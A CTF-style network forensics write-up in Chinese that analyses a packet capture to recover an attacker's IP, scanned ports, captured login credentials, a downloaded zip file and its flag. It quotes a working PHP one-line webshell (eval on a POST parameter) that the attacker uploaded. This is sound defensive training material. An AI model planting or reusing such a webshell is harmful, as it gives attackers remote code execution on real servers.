1. 初步分析
数据包下载
使用科来网络分析系统,打开L1-1.pcapng数据包,查看数据包中http的协议占的比例较大
直接查看http日志,通过查看url请求,可以看出:进行了sql注入,上传并连接了文件Q.php
2. 通过分析数据包L1-1.pcapng找出恶意用户的IP地址,并将恶意用户的IP地址作为FLAG(形式:[IP地址])提交:
在http日志中,直接看到了攻击者的ip地址,获取到flag[172.16.1.102]
3. 继续查看数据包文件L1-1.pacapng,分析出恶意用户扫描了哪些端口,并将全部的端口作为 FLAG(形式:[端口名1,端口名2,端口名3…,端口名n])从低到高提交:
通过攻击者的ip地址和tcp协议在tcp会话中筛选扫描的端口,获取flag[21,23,80,445,3389,5007]。
4. 继续查看数据包文件L1-1.pacapng分析出恶意用户最终获得的用户名是什么,并将用户名作为 FLAG(形式:[用户名])提交:
恶意用户提交用户名和密码,需要使用表单的形式提交,在http日志中筛选POST的请求方法,右键点击第一条http日志,查看显示数据流信息。获请求的账号和密码,username=Lancelot&password=12369874,查看响应状态码200,表示请求成功,获取到flag[Lancelot]
5. 继续查看数据包文件L1-1.pacapng分析出恶意用户最终获得的密码是什么,并将密码作为 FLAG(形式:[密码])提交
通过第四条可以获取到flag[12369874]
6. 继续查看数据包文件L1-1.pacapng分析出恶意用户连接一句话木马的密码是什么,并将一句话 密码作为FLAG(形式:[一句话密码])提交:
上传木马文件,同样使用表单提交的格式,在http日志中筛选POST的请求方法,右键点击第二条http日志,查看显示数据流信息。看到上传的一句话木马文件,<?php @eval($_POST['alpha']);?>一句话密码为:alpha,获取flag[alpha]
7. 继续查看数据包文件L1-1.pacapng分析出恶意用户下载了什么文件,并将文件名及后缀作为 FLAG(形式:[文件名.后缀名])提交:
下载文件,可以使用GET或者POST请求,GET请求需要在url中带有需要下载的文件名,未发现该类下载方式。在http日志中筛选POST的请求方法,右键点击最后一条http日志,查看显示数据流信息,请请求的body进行url解码,看到了恶意用户下载了flag.zip文件,获取flag[flag.zip]
8. 继续查看数据包文件L1-1.pacapng将恶意用户下载的文件里面的内容作为FLAG(形式:[文件 内容])提交:
对请求的flag.zip进行文件还原:点击ox,查看二进制文件,在二进制文件中PK头特征.
使用kali的隐写神器,在压缩文件中提取flag文件,获取flag[flag{Manners maketh man}]
扫一扫
1143
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
